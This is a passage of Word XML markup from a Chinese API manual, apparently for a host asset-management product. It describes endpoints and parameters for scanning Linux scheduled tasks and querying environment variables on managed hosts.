        <w:lastRenderedPageBreak/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731A5622" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54675AD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/task/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C142FE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7DEC22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8B7EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F150EA8"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错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E04421"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398E3DC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7A2A4FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A0798A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58639818" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FCEBF4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55F5A25D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20E59DF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23E8F06F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5C898C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1594AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B62AABE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>计划任务信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D1683" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/task/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995711C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc115166134"/>
      <w:bookmarkStart w:id="120" w:name="计划任务信息查询扫描状态"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计划任务信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="752130FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询计划任务信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15613075" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc115166135"/>
      <w:bookmarkStart w:id="122" w:name="环境变量信息"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r>
        <w:t>环境变量信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="4C8CA430" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A839B4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的环境变量信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9DF52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68291A6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>环境变量信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE7353E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2521B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44B3B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE7DFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>环境变量信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D245A4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>环境变量信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A944CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>环境变量信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0ED25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125696A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用环境变量信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD97CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361549DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFC4E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc115166136"/>
      <w:bookmarkStart w:id="124" w:name="环境变量信息查询结果"/>
      <w:r>
        <w:t>环境变量信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="7CF1CA66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询环境变量信息，按每台主机每个环境变量进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EEAE41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799FCF8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/env/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA2932"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="40DE71F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C3B160A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C9644A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16192F98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F43A359" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44736B44" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C6C209" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="540E9AAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F50BCA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676262C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56CC70C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE6F1C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D67CF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478409FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F7FD99F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="667A2BBB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C0EFE65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="664257CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2F886D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C918A7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F866159" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77EC94B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A127DB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="426D7660" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C6310BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="246DA726" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61519E2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="132DEE28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="641624C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="408E0BF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D7807E1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB21AEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BF9976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="556F39E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270C49CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CBE7357" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D30461" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5BB535" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B43A665" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5338FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49C0FF51" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715BAF3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysEnv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="655EA0CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4C0388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51306C8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C0F92B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7BD9C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
